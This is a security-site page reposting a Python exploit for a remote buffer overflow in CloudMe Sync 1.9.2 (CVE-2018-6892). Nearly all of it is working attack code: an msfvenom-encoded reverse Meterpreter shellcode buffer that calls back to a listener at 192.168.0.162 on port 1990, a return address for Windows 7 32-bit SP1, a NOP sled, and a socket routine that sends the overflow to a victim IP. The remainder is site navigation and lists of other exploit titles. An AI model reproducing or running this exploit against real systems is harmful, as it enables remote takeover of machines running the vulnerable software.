首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CloudMe Sync 1.9.2 Remote Buffer Overflow
来源:http://www.r00tpgp.com 作者:r00tpgp 发布时间:2018-03-06  
#!/usr/bin/python
# CloudMe Sync 1.9.2 Remote Exploit
# Written by r00tpgp @ http://www.r00tpgp.com
# Usage: python CloudMe-1.9.2-Exploit.py <victim-ip> <port>
# Spawns reverse meterpreter LHOST=192.168.0.68 LPORT=1990
# CVE: CVE-2018-6892
# CloudMe Installer: https://org.cloudme.com/en/sync
# Tested on Windows 7 32b SP1

import sys, socket, time
 
host = sys.argv[1] # Recieve IP from user
port = int(sys.argv[2]) # Recieve Port from user
 
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b '"\x00\x0a\x0d'
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# Found 10 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 360 (iteration=0)
# x86/shikata_ga_nai chosen with final size 360
# Payload size: 360 bytes
# Final size of python file: 1730 bytes
buf =  ""
buf += "\xbd\xb6\xb3\x2c\xc1\xdb\xdd\xd9\x74\x24\xf4\x58\x2b"
buf += "\xc9\xb1\x54\x83\xe8\xfc\x31\x68\x0f\x03\x68\xb9\x51"
buf += "\xd9\x3d\x2d\x17\x22\xbe\xad\x78\xaa\x5b\x9c\xb8\xc8"
buf += "\x28\x8e\x08\x9a\x7d\x22\xe2\xce\x95\xb1\x86\xc6\x9a"
buf += "\x72\x2c\x31\x94\x83\x1d\x01\xb7\x07\x5c\x56\x17\x36"
buf += "\xaf\xab\x56\x7f\xd2\x46\x0a\x28\x98\xf5\xbb\x5d\xd4"
buf += "\xc5\x30\x2d\xf8\x4d\xa4\xe5\xfb\x7c\x7b\x7e\xa2\x5e"
buf += "\x7d\x53\xde\xd6\x65\xb0\xdb\xa1\x1e\x02\x97\x33\xf7"
buf += "\x5b\x58\x9f\x36\x54\xab\xe1\x7f\x52\x54\x94\x89\xa1"
buf += "\xe9\xaf\x4d\xd8\x35\x25\x56\x7a\xbd\x9d\xb2\x7b\x12"
buf += "\x7b\x30\x77\xdf\x0f\x1e\x9b\xde\xdc\x14\xa7\x6b\xe3"
buf += "\xfa\x2e\x2f\xc0\xde\x6b\xeb\x69\x46\xd1\x5a\x95\x98"
buf += "\xba\x03\x33\xd2\x56\x57\x4e\xb9\x3e\x94\x63\x42\xbe"
buf += "\xb2\xf4\x31\x8c\x1d\xaf\xdd\xbc\xd6\x69\x19\xc3\xcc"
buf += "\xce\xb5\x3a\xef\x2e\x9f\xf8\xbb\x7e\xb7\x29\xc4\x14"
buf += "\x47\xd6\x11\x80\x4d\x40\x5a\xfd\x52\x32\x32\xfc\x52"
buf += "\x35\x05\x89\xb5\x69\xd9\xda\x69\xc9\x89\x9a\xd9\xa1"
buf += "\xc3\x14\x05\xd1\xeb\xfe\x2e\x7b\x04\x57\x06\x13\xbd"
buf += "\xf2\xdc\x82\x42\x29\x99\x84\xc9\xd8\x5d\x4a\x3a\xa8"
buf += "\x4d\xba\x5b\x52\x8e\x3a\xf6\x52\xe4\x3e\x50\x04\x90"
buf += "\x3c\x85\x62\x3f\xbf\xe0\xf0\x38\x3f\x75\xc1\x33\x09"
buf += "\xe3\x6d\x2c\x75\xe3\x6d\xac\x23\x69\x6e\xc4\x93\xc9"
buf += "\x3d\xf1\xdc\xc7\x51\xaa\x48\xe8\x03\x1e\xdb\x80\xa9"
buf += "\x79\x2b\x0f\x51\xac\x28\x48\xad\x32\x0c\xf1\xc6\xcc"
buf += "\x10\x01\x17\xa7\x90\x51\x7f\x3c\xbf\x5e\x4f\xbd\x6a"
buf += "\x37\xc7\x34\xfa\xf5\x76\x48\xd7\x58\x27\x49\xdb\x40"
buf += "\x3e\xc4\x1c\x77\x3f\x26\x21\xa1\x06\x5c\x62\x71\x3d"
buf += "\x6f\xd9\xd4\x14\xfa\x21\x4a\x66\x2f";

# Return Address for Windows 7 32b SP1
ret = '\x25\xDF\xB8\x68'

# NOP Padding
nop = '\x90'*20
 
# EIP Writing Pattern
pattern = "A"*1036 + ret + nop + buf # Our exploit together. Junk -&gt; Return Address -&gt; NOPS -&gt; Shellcode
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socket
client.connect((host, port)) # Connect to user supplied port and IP address
client.send(pattern) # Send the user command with a variable length name
client.close() # Close the Connection



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Chrome V8 JIT JSBuiltinReducer
·Eclipse Equinoxe OSGi Console
·Chrome V8 Out-Of-Bounds Read
·Chrome V8 JIT Optmization Bug
·Softros Network Time System Se
·Chrome V8 JIT GetSpecializatio
·Memcached - 'memcrashed' Denia
·Tenda AC15 Router - Pe-authent
·ActivePDF Toolkit < 8.1.0.1902
·Sophos UTM 9.410 - 'loginuser'
·Dup Scout Enterprise 10.5.12 -
·Xion 1.0.125 - '.m3u' Local SE
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved